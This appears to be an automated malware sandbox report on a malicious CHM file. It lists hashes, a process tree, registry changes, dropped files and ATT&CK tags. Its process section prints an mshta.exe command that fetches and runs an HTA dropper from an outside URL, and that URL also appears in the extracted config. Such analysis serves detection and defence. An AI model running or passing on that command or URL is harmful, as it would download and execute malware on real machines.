b16ebaec337178a9f4c661d84a9998e453f4b693eab3e3fbc9bb6b957661f3c6

Analysis

max time kernel
145s
max time network
150s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
21-03-2023 23:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Message.chm
Size

32KB
MD5

0bf993c36aac528135749ec494f96e96
SHA1

2082df9f3c58fc1c5fc285c07f25e93e30665a74
SHA256

1830b84698851535c1029d10190e5d5518f90472102918a336222e9e9c7dba1b
SHA512

ffac9634e01a2b74131780500c40881ed5092c87194296bbe6e579e8cab50ca663086a7fd66b5a6a4f1de6053d22068d485b78e0382ec893e3c4c983ff8a58ec
SSDEEP

768:BQJWnBJ1mYvGnYULEgbSF82B46DzDoEP4IiZx:BQJWnHGY8uZNzDoFIE

Score

10^/10

discovery

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://attiferstudio.com/install.bak/sony/4.html

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

mshta.exe

flow pid process

7 1916 mshta.exe
Executes dropped EXE 2 IoCs

Processes:

setup.exesetup.tmp

pid process

2044 setup.exe
2020 setup.tmp
Loads dropped DLL 6 IoCs

Processes:

setup.exesetup.tmpregsvr32.exeregsvr32.exe

pid process

2044 setup.exe
2020 setup.tmp
2020 setup.tmp
1964 regsvr32.exe
1964 regsvr32.exe
1636 regsvr32.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

flow	pid	process
7	1916	mshta.exe

pid	process
2044	setup.exe
2020	setup.tmp

pid	process
2044	setup.exe
2020	setup.tmp
2020	setup.tmp
1964	regsvr32.exe
1964	regsvr32.exe
1636	regsvr32.exe

Drops file in Program Files directory 6 IoCs

Processes:

setup.tmp

description	ioc	process
File created	C:\Program Files (x86)\jmi\jxcommon\is-SJ0V8.tmp	setup.tmp
File created	C:\Program Files (x86)\JMI\JXMailOCX\is-OSHPM.tmp	setup.tmp
File opened for modification	C:\Program Files (x86)\JMI\JXMailOCX\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\JMI\JXMailOCX\unins000.dat	setup.tmp
File created	C:\Program Files (x86)\JMI\JXMailOCX\is-J95A7.tmp	setup.tmp
File created	C:\Program Files (x86)\jmi\jxcommon\is-34CV0.tmp	setup.tmp

Drops file in Windows directory 4 IoCs

Processes:

hh.exe

description	ioc	process
File created	C:\Windows\Downloaded Program Files\SET7466.tmp	hh.exe
File opened for modification	C:\Windows\Downloaded Program Files\JXmail25.inf	hh.exe
File opened for modification	C:\Windows\INF\setupapi.app.log	hh.exe
File opened for modification	C:\Windows\Downloaded Program Files\SET7466.tmp	hh.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

Processes:

hh.exemshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main	hh.exe
Key created	\REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies registry class 64 IoCs

Processes:

regsvr32.exeregsvr32.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ACD82721-F281-44EA-A881-24112145D200}\TypeLib\ = "{F9B8D303-3E64-4319-BB82-FA8BB857F7EF}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EE4FEA75-2C07-4F40-A88D-79B0C59CDDB3}\ = "_DJXMailViewer"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\Implemented Categories\{7DD95801-9882-11CF-9FA9-00AA006C42C4}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\ProgID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\MiscStatus\1	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00CF3DE2-4FE7-4429-AAF9-8EC7D786A82A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\JXMAILVIEWEROCX.JXMailViewerCtrl.1\CLSID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}\1.0\HELPDIR	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\ProgID	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\AppID = "{00CF3DE2-4FE7-4429-AAF9-8EC7D786A82A}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}\1.0\FLAGS	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\JMI\\JXMailOCX"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EE4FEA75-2C07-4F40-A88D-79B0C59CDDB3}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\ProgID\ = "JxVistaDll.JXVistaUtil.1"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\Insertable	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\jmi\\jxcommon\\JxVistaDll.dll, 102"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\MiscStatus	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\MiscStatus\ = "0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EE4FEA75-2C07-4F40-A88D-79B0C59CDDB3}\TypeLib\ = "{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\ToolboxBitmap32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JxVistaDll.JXVistaUtil\CLSID\ = "{EEABD44F-8270-48C4-83C8-A82CE5842549}"	regsvr32.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\Elevation\Enabled = "1"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ACD82721-F281-44EA-A881-24112145D200}\ = "IJXVistaUtil"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EE4FEA75-2C07-4F40-A88D-79B0C59CDDB3}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{ACD82721-F281-44EA-A881-24112145D200}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}\1.0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B366F851-0EE2-4A88-AA70-DDD3BFC240C4}\InprocServer32\ = "C:\\PROGRA~2\\JMI\\JXMAIL~1\\JXMAIL~1.OCX"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\TypeLib\ = "{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\MiscStatus\1\ = "131473"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\Implemented Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{00CF3DE2-4FE7-4429-AAF9-8EC7D786A82A}\DllSurrogate	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F9B8D303-3E64-4319-BB82-FA8BB857F7EF}\1.0\0\win32\ = "C:\\Program Files (x86)\\jmi\\jxcommon\\JxVistaDll.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{ACD82721-F281-44EA-A881-24112145D200}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ACD82721-F281-44EA-A881-24112145D200}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\JxVistaDll.JXVistaUtil.1	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JxVistaDll.JXVistaUtil\ = "JXVistaUtil Class"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\Elevation	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JXMAILVIEWEROCX.JXMailViewerCtrl.1\CLSID\ = "{A56A1518-A259-4109-98B3-06A30F09AB1B}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\Control	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ACD82721-F281-44EA-A881-24112145D200}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EE4FEA75-2C07-4F40-A88D-79B0C59CDDB3}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}\ = "_DJXMailViewerEvents"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F9B8D303-3E64-4319-BB82-FA8BB857F7EF}\1.0\ = "JxVistaDll 1.0 Type Library"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{ACD82721-F281-44EA-A881-24112145D200}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\ToolboxBitmap32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}\TypeLib\ = "{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B366F851-0EE2-4A88-AA70-DDD3BFC240C4}\ = "JXMailViewer Property Page"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F9B8D303-3E64-4319-BB82-FA8BB857F7EF}\1.0\FLAGS	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7F75A8B3-1402-4BE1-8E25-F9E8DAD506F6}\TypeLib\ = "{CA0FC5CD-0C6C-4D0C-A6D6-BAD293C83373}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\Version\ = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F9B8D303-3E64-4319-BB82-FA8BB857F7EF}\1.0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ACD82721-F281-44EA-A881-24112145D200}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B366F851-0EE2-4A88-AA70-DDD3BFC240C4}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\Control	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A56A1518-A259-4109-98B3-06A30F09AB1B}\Version	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{EEABD44F-8270-48C4-83C8-A82CE5842549}\VersionIndependentProgID	regsvr32.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

AUDIODG.EXEhh.exe

description	pid	process
Token: 33	1784	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1784	AUDIODG.EXE
Token: 33	1784	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1784	AUDIODG.EXE
Token: SeRestorePrivilege	1992	hh.exe
Token: SeRestorePrivilege	1992	hh.exe
Token: SeRestorePrivilege	1992	hh.exe
Token: SeRestorePrivilege	1992	hh.exe
Token: SeRestorePrivilege	1992	hh.exe
Token: SeRestorePrivilege	1992	hh.exe
Token: SeRestorePrivilege	1992	hh.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

setup.tmp

pid process

2020 setup.tmp
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

hh.exe

pid process

1992 hh.exe
1992 hh.exe

pid	process
2020	setup.tmp

pid	process
1992	hh.exe
1992	hh.exe

Suspicious use of WriteProcessMemory 31 IoCs

Processes:

hh.exesetup.exesetup.tmp

description	pid	process	target process
PID 1992 wrote to memory of 1916	1992	hh.exe	mshta.exe
PID 1992 wrote to memory of 1916	1992	hh.exe	mshta.exe
PID 1992 wrote to memory of 1916	1992	hh.exe	mshta.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 1992 wrote to memory of 2044	1992	hh.exe	setup.exe
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2044 wrote to memory of 2020	2044	setup.exe	setup.tmp
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1964	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe
PID 2020 wrote to memory of 1636	2020	setup.tmp	regsvr32.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\hh.exe
"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\Message.chm
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" http://attiferstudio.com/install.bak/sony/4.html ,
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1916

C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe /SILENT
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2044

C:\Users\Admin\AppData\Local\Temp\is-DA5TN.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DA5TN.tmp\setup.tmp" /SL5="$10186,232352,54272,C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe" /SILENT
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\jmi\jxcommon\JxVistaDll.dll"
4⤵
- Loads dropped DLL
- Modifies registry class
PID:1964

C:\Windows\SysWOW64\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\JMI\JXMailOCX\JXMailViewerOCX.ocx"
4⤵
- Loads dropped DLL
- Modifies registry class
PID:1636

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0xc4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\JMI\JXMailOCX\JXMailViewerOCX.ocx
Filesize
592KB

MD5
76bb69b34320f8e6cdbfc579ec82a686

SHA1
74451ca0b37a1091c9bc0de032c18f5ccb766a78

SHA256
db9595cc365b389d0a78fbbc3a1710afc5271b3c829a92d312d0c3acf235e135

SHA512
042e234ad03af3a308f73d3a6600913118f2cf33da0ce1b1ea9db3a938baafb971649e57044b446926d7a0b3a38d78dd6783014cfb343155b63733633c644d77

Download Submit
C:\Program Files (x86)\jmi\jxcommon\JxVistaDll.dll
Filesize
88KB

MD5
6161c9cac29f98219bd7a118f9accea6

SHA1
8aa08500af2d8c9dc8b1e1a9363ac39e03aeb533

SHA256
cf5a0feb0ae47324252d279899ebca3cd8b82f1e5c02397f06946d342ff25160

SHA512
7b9967ef3075a9268886ccfef00edaa72d908cd7f74b715761de2811968d52ca731ba98e3e0b59aacb27eedd1ff271a422fb558d7713f02caa9445ac79ce5e32

Download Submit
C:\Program Files (x86)\jmi\jxcommon\JxZipDll.dll
Filesize
76KB

MD5
9e37ddec8c44266c4242c4ea0e9e1961

SHA1
5a920e96c9ab3e85ebe24c60cc54035ccc6c60e5

SHA256
39454653f32c20f386a800ed8c0eaea45fbd81df11562f14390eb5dec89c287e

SHA512
b4132d3d75de81f1dfcf62b154b42955bd558fcf47c06c96dddc806bc1d810bfb3d1ef60d7a574942f616692554dc2c551ddc19ca1af8838d3f9acde949944db

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
61KB

MD5
e71c8443ae0bc2e282c73faead0a6dd3

SHA1
0c110c1b01e68edfacaeae64781a37b1995fa94b

SHA256
95b0a5acc5bf70d3abdfd091d0c9f9063aa4fde65bd34dbf16786082e1992e72

SHA512
b38458c7fa2825afb72794f374827403d5946b1132e136a0ce075dfd351277cf7d957c88dc8a1e4adc3bcae1fa8010dae3831e268e910d517691de24326391a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QCNSQOTT\soft25_2[1].cab
Filesize
447KB

MD5
a227025dc3fd7fd3f02bbcc55a40687e

SHA1
756b6c85df46f3f09fc5ae3160f54c99aa958e14

SHA256
29bf42a256638e8fede712e4aa7caa980e1cf40790bd2698ab6ef1a87d2387ca

SHA512
be655cfd9a08ee9c9f329e3e279fa33a8e090e5dfdbf6d25ef7afbee7e620953e545b5da72a8db9beefd88b69f9d4d72db7bef5f8c039617df85f3c5edecf0e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\JXmail25.inf
Filesize
148B

MD5
4c88264dca9aca63660a77dd7db9c8b7

SHA1
6dcb6b9e22d3bd92cc1c72fddb58e8e65d0884eb

SHA256
1b6e64adffde1e9ae08556eabafafda7a1a32dc5bc852fc40fcd3306e733a776

SHA512
08ff951203a83076caa3de8817b8e33e7724d0c9c429836a34fbc2e6f92615d03b4dd7d9213af98571fd2485c73743cd9ca6e975f8516874faea572164a174f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe
Filesize
463KB

MD5
374c3653388f264cff1df0bdf3b86f7d

SHA1
dcd924874c0d7b00bfbccc1e578890528641b1af

SHA256
0308b61c51db0f4a037a0ea320a9a7512ef5ef62c7a2dd5b54786714308e8966

SHA512
22281ce99732c4b299aacbfe30739a59f62fabdd61181e686867230fbf50bac90b17c012608e190fe6c0569b17d7c2b56149434cb99906c28ba587966101e0f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ICD1.tmp\setup.exe
Filesize
463KB

MD5
374c3653388f264cff1df0bdf3b86f7d

SHA1
dcd924874c0d7b00bfbccc1e578890528641b1af

SHA256
0308b61c51db0f4a037a0ea320a9a7512ef5ef62c7a2dd5b54786714308e8966

SHA512
22281ce99732c4b299aacbfe30739a59f62fabdd61181e686867230fbf50bac90b17c012608e190fe6c0569b17d7c2b56149434cb99906c28ba587966101e0f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DA5TN.tmp\setup.tmp
Filesize
688KB

MD5
c765336f0dcf4efdcc2101eed67cd30c

SHA1
fa0279f59738c5aa3b6b20106e109ccd77f895a7

SHA256
c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28

SHA512
06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-DA5TN.tmp\setup.tmp
Filesize
688KB

MD5
c765336f0dcf4efdcc2101eed67cd30c

SHA1
fa0279f59738c5aa3b6b20106e109ccd77f895a7

SHA256
c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28

SHA512
06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891

Download Submit
\Program Files (x86)\JMI\JXMailOCX\JXMailViewerOCX.ocx
Filesize
592KB

MD5
76bb69b34320f8e6cdbfc579ec82a686

SHA1
74451ca0b37a1091c9bc0de032c18f5ccb766a78

SHA256
db9595cc365b389d0a78fbbc3a1710afc5271b3c829a92d312d0c3acf235e135

SHA512
042e234ad03af3a308f73d3a6600913118f2cf33da0ce1b1ea9db3a938baafb971649e57044b446926d7a0b3a38d78dd6783014cfb343155b63733633c644d77

Download Submit
\Program Files (x86)\JMI\jxcommon\JxVistaDll.dll
Filesize
88KB

MD5
6161c9cac29f98219bd7a118f9accea6

SHA1
8aa08500af2d8c9dc8b1e1a9363ac39e03aeb533

SHA256
cf5a0feb0ae47324252d279899ebca3cd8b82f1e5c02397f06946d342ff25160

SHA512
7b9967ef3075a9268886ccfef00edaa72d908cd7f74b715761de2811968d52ca731ba98e3e0b59aacb27eedd1ff271a422fb558d7713f02caa9445ac79ce5e32

Download Submit
\Program Files (x86)\JMI\jxcommon\JxZipDll.dll
Filesize
76KB

MD5
9e37ddec8c44266c4242c4ea0e9e1961

SHA1
5a920e96c9ab3e85ebe24c60cc54035ccc6c60e5

SHA256
39454653f32c20f386a800ed8c0eaea45fbd81df11562f14390eb5dec89c287e

SHA512
b4132d3d75de81f1dfcf62b154b42955bd558fcf47c06c96dddc806bc1d810bfb3d1ef60d7a574942f616692554dc2c551ddc19ca1af8838d3f9acde949944db

Download Submit
\Users\Admin\AppData\Local\Temp\is-DA5TN.tmp\setup.tmp
Filesize
688KB

MD5
c765336f0dcf4efdcc2101eed67cd30c

SHA1
fa0279f59738c5aa3b6b20106e109ccd77f895a7

SHA256
c5177fdc6031728e10141745cd69edbc91c92d14411a2dec6e8e8caa4f74ab28

SHA512
06a67ac37c20897967e2cad453793a6ef1c7804d4c578404f845daa88c859b15b0acb51642e6ad23ca6ba6549b02d5f6c98b1fa402004bdbf9d646abab7ec891

Download Submit
\Users\Admin\AppData\Local\Temp\is-NDE8A.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
\Users\Admin\AppData\Local\Temp\is-NDE8A.tmp\_isetup\_shfoldr.dll
Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
memory/1964-178-0x00000000001B0000-0x00000000001C4000-memory.dmp

Filesize
80KB

Download
memory/2020-173-0x0000000000240000-0x0000000000241000-memory.dmp

Filesize
4KB

Download
memory/2020-185-0x0000000000400000-0x00000000004BC000-memory.dmp

Filesize
752KB

Download
memory/2044-150-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2044-186-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download